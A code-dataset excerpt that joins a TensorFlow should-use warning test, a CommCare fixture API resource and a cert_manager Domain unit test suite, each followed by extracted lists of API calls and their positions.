h = tf_should_use._add_should_use_warning(c, fatal_error=True)
del h
with reroute_error() as (_, fatal):
in_this_function()
fatal.assert_called()
msg = '\n'.join(fatal.call_args[0])
self.assertIn('Object was never used', msg)
self.assertIn('blah0:0', msg)
self.assertIn('in_this_function', msg)
self.assertFalse(gc.garbage)
def _testAddShouldUseWarningWhenUsed(self, fn, name):
c = constant_op.constant(0, name=name)
with reroute_error() as (error, fatal):
h = tf_should_use._add_should_use_warning(c)
fn(h)
del h
error.assert_not_called()
fatal.assert_not_called()
def testAddShouldUseWarningWhenUsedWithAdd(self):
def add(h):
_ = h + 1
self._testAddShouldUseWarningWhenUsed(add, name='blah_add')
gc.collect()
self.assertFalse(gc.garbage)
def testAddShouldUseWarningWhenUsedWithGetName(self):
def get_name(h):
_ = h.name
self._testAddShouldUseWarningWhenUsed(get_name, name='blah_get_name')
gc.collect()
self.assertFalse(gc.garbage)
def testShouldUseResult(self):
@tf_should_use.should_use_result
def return_const(value):
return constant_op.constant(value, name='blah2')
with reroute_error() as (error, _):
return_const(0.0)
error.assert_called()
msg = '\n'.join(error.call_args[0])
self.assertIn('Object was never used', msg)
self.assertIn('blah2:0', msg)
self.assertIn('return_const', msg)
gc.collect()
self.assertFalse(gc.garbage)
def testShouldUseResultWhenNotReallyUsed(self):
@tf_should_use.should_use_result
def return_const(value):
return constant_op.constant(value, name='blah3')
with reroute_error() as (error, _):
with self.test_session():
return_const(0.0)
# Creating another op and executing it does not mark the
# unused op as being "used".
v = constant_op.constant(1.0, name='meh')
v.eval()
error.assert_called()
msg = '\n'.join(error.call_args[0])
self.assertIn('Object was never used', msg)
self.assertIn('blah3:0', msg)
self.assertIn('return_const', msg)
gc.collect()
self.assertFalse(gc.garbage)
# Tests that mark_used is available in the API.
def testMarkUsed(self):
@tf_should_use.should_use_result
def return_const(value):
return constant_op.constant(value, name='blah3')
with self.test_session():
return_const(0.0).mark_used()
if __name__ == '__main__':
test.main()
| [
"tensorflow.python.util.tf_should_use._add_should_use_warning",
"tensorflow.python.framework.constant_op.constant",
"gc.collect",
"tensorflow.python.platform.test.mock.patch.object",
"tensorflow.python.platform.test.main"
]
| [((4539, 4550), 'tensorflow.python.platform.test.main', 'test.main', ([], {}), '()\n', (4548, 4550), False, 'from tensorflow.python.platform import test\n'), ((1240, 1297), 'tensorflow.python.platform.test.mock.patch.object', 'test.mock.patch.object', (['tf_should_use.tf_logging', '"""error"""'], {}), "(tf_should_use.tf_logging, 'error')\n", (1262, 1297), False, 'from tensorflow.python.platform import test\n'), ((1507, 1544), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(0)'], {'name': '"""blah0"""'}), "(0, name='blah0')\n", (1527, 1544), False, 'from tensorflow.python.framework import constant_op\n'), ((1980, 2017), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(0)'], {'name': '"""blah0"""'}), "(0, name='blah0')\n", (2000, 2017), False, 'from tensorflow.python.framework import constant_op\n'), ((2481, 2515), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(0)'], {'name': 'name'}), '(0, name=name)\n', (2501, 2515), False, 'from tensorflow.python.framework import constant_op\n'), ((2848, 2860), 'gc.collect', 'gc.collect', ([], {}), '()\n', (2858, 2860), False, 'import gc\n'), ((3067, 3079), 'gc.collect', 'gc.collect', ([], {}), '()\n', (3077, 3079), False, 'import gc\n'), ((3523, 3535), 'gc.collect', 'gc.collect', ([], {}), '()\n', (3533, 3535), False, 'import gc\n'), ((4199, 4211), 'gc.collect', 'gc.collect', ([], {}), '()\n', (4209, 4211), False, 'import gc\n'), ((1317, 1374), 'tensorflow.python.platform.test.mock.patch.object', 'test.mock.patch.object', (['tf_should_use.tf_logging', '"""fatal"""'], {}), "(tf_should_use.tf_logging, 'fatal')\n", (1339, 1374), False, 'from tensorflow.python.platform import test\n'), ((1583, 1623), 'tensorflow.python.util.tf_should_use._add_should_use_warning', 'tf_should_use._add_should_use_warning', (['c'], {}), '(c)\n', (1620, 1623), False, 'from tensorflow.python.util import tf_should_use\n'), ((2056, 2114), 'tensorflow.python.util.tf_should_use._add_should_use_warning', 'tf_should_use._add_should_use_warning', (['c'], {'fatal_error': '(True)'}), '(c, fatal_error=True)\n', (2093, 2114), False, 'from tensorflow.python.util import tf_should_use\n'), ((2570, 2610), 'tensorflow.python.util.tf_should_use._add_should_use_warning', 'tf_should_use._add_should_use_warning', (['c'], {}), '(c)\n', (2607, 2610), False, 'from tensorflow.python.util import tf_should_use\n'), ((3226, 3267), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['value'], {'name': '"""blah2"""'}), "(value, name='blah2')\n", (3246, 3267), False, 'from tensorflow.python.framework import constant_op\n'), ((3699, 3740), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['value'], {'name': '"""blah3"""'}), "(value, name='blah3')\n", (3719, 3740), False, 'from tensorflow.python.framework import constant_op\n'), ((4401, 4442), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['value'], {'name': '"""blah3"""'}), "(value, name='blah3')\n", (4421, 4442), False, 'from tensorflow.python.framework import constant_op\n'), ((3953, 3990), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(1.0)'], {'name': '"""meh"""'}), "(1.0, name='meh')\n", (3973, 3990), False, 'from tensorflow.python.framework import constant_op\n')] |
from couchdbkit import ResourceNotFound
from tastypie import fields as tp_f
from corehq.apps.api.resources import JsonResource
from corehq.apps.api.resources.v0_1 import (
CustomResourceMeta,
RequirePermissionAuthentication,
)
from corehq.apps.api.util import get_object_or_not_exist
from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType
from corehq.apps.users.models import Permissions
def convert_fdt(fdi):
try:
fdt = FixtureDataType.get(fdi.data_type_id)
fdi.fixture_type = fdt.tag
return fdi
except ResourceNotFound:
return fdi
class FixtureResource(JsonResource):
type = "fixture"
fields = tp_f.DictField(attribute='try_fields_without_attributes',
readonly=True, unique=True)
# when null, that means the ref'd fixture type was not found
fixture_type = tp_f.CharField(attribute='fixture_type', readonly=True,
null=True)
id = tp_f.CharField(attribute='_id', readonly=True, unique=True)
def obj_get(self, bundle, **kwargs):
return convert_fdt(get_object_or_not_exist(
FixtureDataItem, kwargs['pk'], kwargs['domain']))
def obj_get_list(self, bundle, **kwargs):
domain = kwargs['domain']
parent_id = bundle.request.GET.get("parent_id", None)
parent_ref_name = bundle.request.GET.get("parent_ref_name", None)
references = bundle.request.GET.get("references", None)
child_type = bundle.request.GET.get("child_type", None)
type_id = bundle.request.GET.get("fixture_type_id", None)
type_tag = bundle.request.GET.get("fixture_type", None)
if parent_id and parent_ref_name and child_type and references:
parent_fdi = FixtureDataItem.get(parent_id)
fdis = list(
FixtureDataItem.by_field_value(
domain, child_type, parent_ref_name,
parent_fdi.fields_without_attributes[references])
)
elif type_id or type_tag:
type_id = type_id or FixtureDataType.by_domain_tag(
domain, type_tag).one()
fdis = list(FixtureDataItem.by_data_type(domain, type_id))
else:
fdis = list(FixtureDataItem.by_domain(domain))
return [convert_fdt(fdi) for fdi in fdis] or []
class Meta(CustomResourceMeta):
authentication = RequirePermissionAuthentication(Permissions.edit_apps)
object_class = FixtureDataItem
resource_name = 'fixture'
limit = 0
| [
"corehq.apps.api.resources.v0_1.RequirePermissionAuthentication",
"tastypie.fields.CharField",
"corehq.apps.fixtures.models.FixtureDataItem.by_domain",
"corehq.apps.api.util.get_object_or_not_exist",
"corehq.apps.fixtures.models.FixtureDataItem.by_field_value",
"corehq.apps.fixtures.models.FixtureDataType.by_domain_tag",
"tastypie.fields.DictField",
"corehq.apps.fixtures.models.FixtureDataItem.get",
"corehq.apps.fixtures.models.FixtureDataType.get",
"corehq.apps.fixtures.models.FixtureDataItem.by_data_type"
]
| [((674, 763), 'tastypie.fields.DictField', 'tp_f.DictField', ([], {'attribute': '"""try_fields_without_attributes"""', 'readonly': '(True)', 'unique': '(True)'}), "(attribute='try_fields_without_attributes', readonly=True,\n unique=True)\n", (688, 763), True, 'from tastypie import fields as tp_f\n'), ((872, 938), 'tastypie.fields.CharField', 'tp_f.CharField', ([], {'attribute': '"""fixture_type"""', 'readonly': '(True)', 'null': '(True)'}), "(attribute='fixture_type', readonly=True, null=True)\n", (886, 938), True, 'from tastypie import fields as tp_f\n'), ((982, 1041), 'tastypie.fields.CharField', 'tp_f.CharField', ([], {'attribute': '"""_id"""', 'readonly': '(True)', 'unique': '(True)'}), "(attribute='_id', readonly=True, unique=True)\n", (996, 1041), True, 'from tastypie import fields as tp_f\n'), ((461, 498), 'corehq.apps.fixtures.models.FixtureDataType.get', 'FixtureDataType.get', (['fdi.data_type_id'], {}), '(fdi.data_type_id)\n', (480, 498), False, 'from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType\n'), ((2417, 2471), 'corehq.apps.api.resources.v0_1.RequirePermissionAuthentication', 'RequirePermissionAuthentication', (['Permissions.edit_apps'], {}), '(Permissions.edit_apps)\n', (2448, 2471), False, 'from corehq.apps.api.resources.v0_1 import CustomResourceMeta, RequirePermissionAuthentication\n'), ((1111, 1183), 'corehq.apps.api.util.get_object_or_not_exist', 'get_object_or_not_exist', (['FixtureDataItem', "kwargs['pk']", "kwargs['domain']"], {}), "(FixtureDataItem, kwargs['pk'], kwargs['domain'])\n", (1134, 1183), False, 'from corehq.apps.api.util import get_object_or_not_exist\n'), ((1771, 1801), 'corehq.apps.fixtures.models.FixtureDataItem.get', 'FixtureDataItem.get', (['parent_id'], {}), '(parent_id)\n', (1790, 1801), False, 'from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType\n'), ((1843, 1964), 'corehq.apps.fixtures.models.FixtureDataItem.by_field_value', 'FixtureDataItem.by_field_value', (['domain', 'child_type', 'parent_ref_name', 'parent_fdi.fields_without_attributes[references]'], {}), '(domain, child_type, parent_ref_name,\n parent_fdi.fields_without_attributes[references])\n', (1873, 1964), False, 'from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType\n'), ((2178, 2223), 'corehq.apps.fixtures.models.FixtureDataItem.by_data_type', 'FixtureDataItem.by_data_type', (['domain', 'type_id'], {}), '(domain, type_id)\n', (2206, 2223), False, 'from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType\n'), ((2263, 2296), 'corehq.apps.fixtures.models.FixtureDataItem.by_domain', 'FixtureDataItem.by_domain', (['domain'], {}), '(domain)\n', (2288, 2296), False, 'from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType\n'), ((2083, 2130), 'corehq.apps.fixtures.models.FixtureDataType.by_domain_tag', 'FixtureDataType.by_domain_tag', (['domain', 'type_tag'], {}), '(domain, type_tag)\n', (2112, 2130), False, 'from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType\n')] |
# -*- coding: utf-8 -*-
"""Define the cert_manager.domain.Domain unit tests."""
# Don't warn about things that happen as that is part of unit testing
# pylint: disable=protected-access
# pylint: disable=no-member
import json
from requests.exceptions import HTTPError
from testtools import TestCase
import responses
from cert_manager.domain import Domain, DomainCreationResponseError
from .lib.testbase import ClientFixture
class TestDomain(TestCase): # pylint: disable=too-few-public-methods
"""Serve as a Base class for all tests of the Domain class."""
def setUp(self): # pylint: disable=invalid-name
"""Initialize the class."""
# Call the inherited setUp method
super().setUp()
# Make sure the Client fixture is created and setup
self.cfixt = self.useFixture(ClientFixture())
self.client = self.cfixt.client
self.api_url = f"{self.cfixt.base_url}/domain/v1"
# Setup a test response one would expect normally
self.valid_response = [
{"id": 1234, "name": "example.com"},
{"id": 4321, "name": "*.example.com"},
{"id": 4322, "name": "subdomain.example.com"},
]
# Setup a test response for getting a specific Domain
self.valid_individual_response = self.valid_response[0]
self.valid_individual_response["status"] = "Active"
# Setup JSON to return in an error
self.error_response = {"description": "domain error"}
class TestInit(TestDomain):
"""Test the class initializer."""
@responses.activate
def test_param(self):
"""The URL should change if api_version is passed as a parameter."""
# Set a new version
version = "v3"
api_url = f"{self.cfixt.base_url}/domain/{version}"
# Setup the mocked response
responses.add(responses.GET, api_url, json=self.valid_response, status=200)
domain = Domain(client=self.client, api_version=version)
data = domain.all()
# Verify all the query information
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, api_url)
self.assertEqual(data, self.valid_response)
def test_need_client(self):
"""The class should raise an exception without a client parameter."""
self.assertRaises(TypeError, Domain)
class TestAll(TestDomain):
"""Test the .all method."""
@responses.activate
def test_cached(self):
"""The function should return all the data, but should not query the API twice."""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.valid_response, status=200)
domain = Domain(client=self.client)
data = domain.all()
data = domain.all()
# Verify all the query information
# There should only be one call the first time "all" is called.
# Due to pagination, this is only guaranteed as long as the number of
# entries returned is less than the page size
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, self.api_url)
self.assertEqual(data, self.valid_response)
@responses.activate
def test_forced(self):
"""The function should return all the data, but should query the API twice."""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.valid_response, status=200)
domain = Domain(client=self.client)
data = domain.all()
data = domain.all(force=True)
# Verify all the query information
# There should only be one call the first time "all" is called.
# Due to pagination, this is only guaranteed as long as the number of
# entries returned is less than the page size
self.assertEqual(len(responses.calls), 2)
self.assertEqual(responses.calls[0].request.url, self.api_url)
self.assertEqual(responses.calls[1].request.url, self.api_url)
self.assertEqual(data, self.valid_response)
@responses.activate
def test_bad_http(self):
"""The function should raise an HTTPError exception if domains cannot be retrieved from the API."""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.error_response, status=400)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.all)
# Verify all the query information
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, self.api_url)
class TestFind(TestDomain):
"""Test the .find method."""
@responses.activate
def test_no_params(self):
"""Without parameters, the method will return all domains"""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.valid_response, status=200)
domain = Domain(client=self.client)
data = domain.find()
self.assertEqual(data, self.valid_response)
@responses.activate
def test_params(self):
"""Parameters will be passed to API"""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.valid_response[0], status=200)
api_url = f"{self.api_url}?name=example.com"
domain = Domain(client=self.client)
data = domain.find(name="example.com")
# Verify all the query information
self.assertEqual(responses.calls[0].request.url, api_url)
self.assertEqual(data, self.valid_response[0])
@responses.activate
def test_bad_http(self):
"""The function should raise an HTTPError exception if domains cannot be retrieved from the API."""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.error_response, status=400)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.find)
# Verify all the query information
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, self.api_url)
class TestCount(TestDomain):
"""Test the .count method."""
@responses.activate
def test_no_params(self):
"""Without parameters, the method will count all domains"""
# Setup the mocked response
count = {"count": len(self.valid_response)}
api_url = f"{self.api_url}/count"
responses.add(responses.GET, api_url, json=count, status=200)
domain = Domain(client=self.client)
data = domain.count()
self.assertEqual(data, count)
self.assertEqual(responses.calls[0].request.url, api_url)
@responses.activate
def test_params(self):
"""Parameters will be passed to API"""
# Setup the mocked response
count = {"count": len(self.valid_response[0])}
api_url = f"{self.api_url}/count"
responses.add(responses.GET, api_url, json=count, status=200)
domain = Domain(client=self.client)
data = domain.count(name="example.com")
# Verify all the query information
self.assertEqual(responses.calls[0].request.url, f"{api_url}?name=example.com")
self.assertEqual(data, count)
@responses.activate
def test_bad_http(self):
"""The function should raise an HTTPError exception if counts cannot be retrieved from the API."""
# Setup the mocked response
api_url = f"{self.api_url}/count"
responses.add(responses.GET, api_url, json=self.error_response, status=400)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.count)
# Verify all the query information
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, api_url)
class TestGet(TestDomain):
"""Test the .get method."""
@responses.activate
def test_need_domain_id(self):
"""The function should raise an exception without an domain_id parameter."""
domain = Domain(client=self.client)
self.assertRaises(TypeError, domain.get)
@responses.activate
def test_domain_id(self):
"""The function should return data about the specified Domain ID."""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}"
# Setup the mocked response
responses.add(responses.GET, api_url, json=self.valid_individual_response, status=200)
domain = Domain(client=self.client)
data = domain.get(domain_id)
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, api_url)
self.assertEqual(data, self.valid_individual_response)
@responses.activate
def test_ne_domain_id(self):
"""The function should raise an HTTPError exception if the specified Domain ID does not exist."""
domain_id = 2345
api_url = f"{self.api_url}/{str(domain_id)}"
# Setup the mocked response
responses.add(responses.GET, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.get, domain_id)
class TestCreate(TestDomain):
"""Test the .create method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# Not going to check every permutation of missing parameters,
# but verify that something is required
self.assertRaises(TypeError, domain.create)
@responses.activate
def test_create_success(self):
"""
The function should return the created domain ID,
as well as add all parameters to the request body
"""
# Setup the mocked response
domain_id = 1234
org_id = 4321
types = ["SSL"]
location = f"{self.api_url}/{str(domain_id)}"
responses.add(responses.POST, self.api_url, headers={"Location": location}, status=201)
domain = Domain(client=self.client)
post_data = {
"name": "sub2.example.com",
"delegations": [{"orgId": org_id, "certTypes": types}]
}
response = domain.create("sub2.example.com", org_id, types)
self.assertEqual(response, {"id": domain_id})
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_create_success_optional_params(self):
"""
The function should return the created domain ID when additional params are specified,
as well add the non-required parameters to the request body
"""
# Setup the mocked response
domain_id = 1234
location = f"{self.api_url}/{str(domain_id)}"
responses.add(responses.POST, self.api_url, headers={"Location": location}, status=201)
domain = Domain(client=self.client)
post_data = {
"name": "sub2.example.com",
"delegations": [{"orgId": 4321, "certTypes": ["SSL"]}],
"description": "Example sub domain"
}
response = domain.create("sub2.example.com", 4321, ["SSL"], description="Example sub domain")
self.assertEqual(response, {"id": domain_id})
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_create_failure_http_error(self):
"""
The function should return an error code and description if the Domain
creation failed.
"""
# Setup the mocked response
responses.add(responses.POST, self.api_url, json=self.error_response,
status=400)
domain = Domain(client=self.client)
create_args = {
"name": "sub2.example.com",
"org_id": 4321,
"cert_types": ["other"]
}
self.assertRaises(ValueError, domain.create, **create_args)
@responses.activate
def test_create_failure_http_status_unexpected(self):
"""
The function should return an error code and description if the Domain
creation failed with DomainCreationResponseError
(unexpected HTTP status code).
"""
# Setup the mocked response
responses.add(responses.POST, self.api_url, json=self.error_response,
status=200)
domain = Domain(client=self.client)
create_args = {
"name": "sub2.example.com",
"org_id": 4321,
"cert_types": ["SSL"]
}
self.assertRaises(DomainCreationResponseError, domain.create, **create_args)
@responses.activate
def test_create_failure_missing_location_header(self):
"""
The function should return an error code and description if the Domain
creation failed with DomainCreationResponseError
(no Location header in response).
"""
# Setup the mocked response
responses.add(responses.POST, self.api_url, status=201)
domain = Domain(client=self.client)
create_args = {
"name": "sub2.example.com",
"org_id": 4321,
"cert_types": ["SSL"]
}
self.assertRaises(DomainCreationResponseError, domain.create, **create_args)
@responses.activate
def test_create_failure_domain_id_not_found(self):
"""
The function should return an error code and description if the Domain
creation failed with DomainCreationResponseError
(Domain ID not found in response).
"""
# Setup the mocked response
responses.add(responses.POST, self.api_url, headers={"Location": "not a url"}, status=201)
domain = Domain(client=self.client)
create_args = {
"name": "sub2.example.com",
"org_id": 4321,
"cert_types": ["SSL"]
}
self.assertRaises(DomainCreationResponseError, domain.create, **create_args)
class TestDelete(TestDomain):
"""Test the .delete method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.delete)
@responses.activate
def test_delete_success(self):
"""The function should return True if the deletion succeeded."""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}"
# Setup the mocked response
responses.add(responses.DELETE, api_url, status=200)
domain = Domain(client=self.client)
response = domain.delete(domain_id)
self.assertEqual(True, response)
@responses.activate
def test_delete_failure_http_error(self):
"""
The function should raise an HTTPError exception if the deletion
failed.
"""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}"
# Setup the mocked response
responses.add(responses.DELETE, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.delete, domain_id)
class TestActivate(TestDomain):
"""Test the .activate method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.activate)
@responses.activate
def test_activate_success(self):
"""The function should return True if the activation succeeded."""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}/activate"
# Setup the mocked response
responses.add(responses.PUT, api_url, status=200)
domain = Domain(client=self.client)
response = domain.activate(domain_id)
self.assertEqual(True, response)
@responses.activate
def test_activate_failure_http_error(self):
"""
The function should raise an HTTPError exception if the deletion
failed.
"""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}/activate"
# Setup the mocked response
responses.add(responses.PUT, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.activate, domain_id)
class TestSuspend(TestDomain):
"""Test the .suspend method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.suspend)
@responses.activate
def test_suspend_success(self):
"""The function should return True if the suspension succeeded."""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}/suspend"
# Setup the mocked response
responses.add(responses.PUT, api_url, status=200)
domain = Domain(client=self.client)
response = domain.suspend(domain_id)
self.assertEqual(True, response)
@responses.activate
def test_suspend_failure_http_error(self):
"""
The function should raise an HTTPError exception if the suspension
failed.
"""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}/suspend"
# Setup the mocked response
responses.add(responses.PUT, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.suspend, domain_id)
class TestDelegate(TestDomain):
"""Test the .delegate method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.delegate)
@responses.activate
def test_delegate_success(self):
"""The function should return True if the delegation succeeded."""
domain_id = 1234
org_id = 4321
types = ["SSL"]
api_url = f"{self.api_url}/{str(domain_id)}/delegation"
# Setup the mocked response
responses.add(responses.POST, api_url, status=200)
domain = Domain(client=self.client)
response = domain.delegate(domain_id, org_id, types)
post_data = {
"orgId": org_id,
"certTypes": types
}
self.assertEqual(True, response)
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_delegate_failure_http_error(self):
"""The function should raise an HTTPError exception if the delegation failed."""
domain_id = 1234
org_id = 4321
types = ["SSL"]
api_url = f"{self.api_url}/{str(domain_id)}/delegation"
# Setup the mocked response
responses.add(responses.POST, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.delegate, domain_id, org_id, types)
class TestRemoveDelegation(TestDomain):
"""Test the .remove_delegation method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.remove_delegation)
@responses.activate
def test_remove_delegation_success(self):
"""The function should return True if the delegation removal succeeded."""
domain_id = 1234
org_id = 4321
types = ["SSL"]
api_url = f"{self.api_url}/{str(domain_id)}/delegation"
# Setup the mocked response
responses.add(responses.DELETE, api_url, status=200)
domain = Domain(client=self.client)
response = domain.remove_delegation(domain_id, org_id, types)
post_data = {
"orgId": org_id,
"certTypes": types
}
self.assertEqual(True, response)
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_remove_delegation_failure_http_error(self):
"""The function should raise an HTTPError exception if the delegation removal failed."""
domain_id = 1234
org_id = 4321
types = ["SSL"]
api_url = f"{self.api_url}/{str(domain_id)}/delegation"
# Setup the mocked response
responses.add(responses.DELETE, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.remove_delegation, domain_id, org_id, types)
class TestApproveDelegation(TestDomain):
"""Test the .approve_delegation method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.approve_delegation)
@responses.activate
def test_approve_delegation_success(self):
"""The function should return True if the approval succeeded."""
domain_id = 1234
org_id = 4321
api_url = f"{self.api_url}/{str(domain_id)}/delegation/approve"
# Setup the mocked response
responses.add(responses.POST, api_url, status=200)
domain = Domain(client=self.client)
response = domain.approve_delegation(domain_id, org_id)
post_data = {
"orgId": org_id,
}
self.assertEqual(True, response)
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_approval_failure_http_error(self):
"""The function should raise an HTTPError exception if the approval failed."""
domain_id = 1234
org_id = 4321
api_url = f"{self.api_url}/{str(domain_id)}/delegation/approve"
# Setup the mocked response
responses.add(responses.POST, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.approve_delegation, domain_id, org_id)
class TestRejectDelegation(TestDomain):
"""Test the .reject_delegation method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.reject_delegation)
@responses.activate
def test_reject_delegation_success(self):
"""The function should return True if the rejection succeeded."""
domain_id = 1234
org_id = 4321
api_url = f"{self.api_url}/{str(domain_id)}/delegation/reject"
# Setup the mocked response
responses.add(responses.POST, api_url, status=200)
domain = Domain(client=self.client)
response = domain.reject_delegation(domain_id, org_id)
post_data = {
"orgId": org_id,
}
self.assertEqual(True, response)
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_reject_failure_http_error(self):
"""The function should raise an HTTPError exception if the rejection failed."""
domain_id = 1234
org_id = 4321
api_url = f"{self.api_url}/{str(domain_id)}/delegation/reject"
# Setup the mocked response
responses.add(responses.POST, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.reject_delegation, domain_id, org_id)
| [
"json.dumps",
"responses.add",
"cert_manager.domain.Domain"
]
| [((1842, 1917), 'responses.add', 'responses.add', (['responses.GET', 'api_url'], {'json': 'self.valid_response', 'status': '(200)'}), '(responses.GET, api_url, json=self.valid_response, status=200)\n', (1855, 1917), False, 'import responses\n'), ((1936, 1983), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client', 'api_version': 'version'}), '(client=self.client, api_version=version)\n', (1942, 1983), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((2629, 2714), 'responses.add', 'responses.add', (['responses.GET', 'self.api_url'], {'json': 'self.valid_response', 'status': '(200)'}), '(responses.GET, self.api_url, json=self.valid_response, status=200\n )\n', (2642, 2714), False, 'import responses\n'), ((2728, 2754), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (2734, 2754), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((3415, 3500), 'responses.add', 'responses.add', (['responses.GET', 'self.api_url'], {'json': 'self.valid_response', 'status': '(200)'}), '(responses.GET, self.api_url, json=self.valid_response, status=200\n )\n', (3428, 3500), False, 'import responses\n'), ((3514, 3540), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (3520, 3540), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((4305, 4390), 'responses.add', 'responses.add', (['responses.GET', 'self.api_url'], {'json': 'self.error_response', 'status': '(400)'}), '(responses.GET, self.api_url, json=self.error_response, status=400\n )\n', (4318, 4390), False, 'import responses\n'), ((4404, 4430), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (4410, 4430), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((4876, 4961), 'responses.add', 'responses.add', (['responses.GET', 'self.api_url'], {'json': 'self.valid_response', 'status': '(200)'}), '(responses.GET, self.api_url, json=self.valid_response, status=200\n )\n', (4889, 4961), False, 'import responses\n'), ((4975, 5001), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (4981, 5001), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((5227, 5314), 'responses.add', 'responses.add', (['responses.GET', 'self.api_url'], {'json': 'self.valid_response[0]', 'status': '(200)'}), '(responses.GET, self.api_url, json=self.valid_response[0],\n status=200)\n', (5240, 5314), False, 'import responses\n'), ((5382, 5408), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (5388, 5408), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((5828, 5913), 'responses.add', 'responses.add', (['responses.GET', 'self.api_url'], {'json': 'self.error_response', 'status': '(400)'}), '(responses.GET, self.api_url, json=self.error_response, status=400\n )\n', (5841, 5913), False, 'import responses\n'), ((5927, 5953), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (5933, 5953), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((6495, 6556), 'responses.add', 'responses.add', (['responses.GET', 'api_url'], {'json': 'count', 'status': '(200)'}), '(responses.GET, api_url, json=count, status=200)\n', (6508, 6556), False, 'import responses\n'), ((6575, 6601), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), 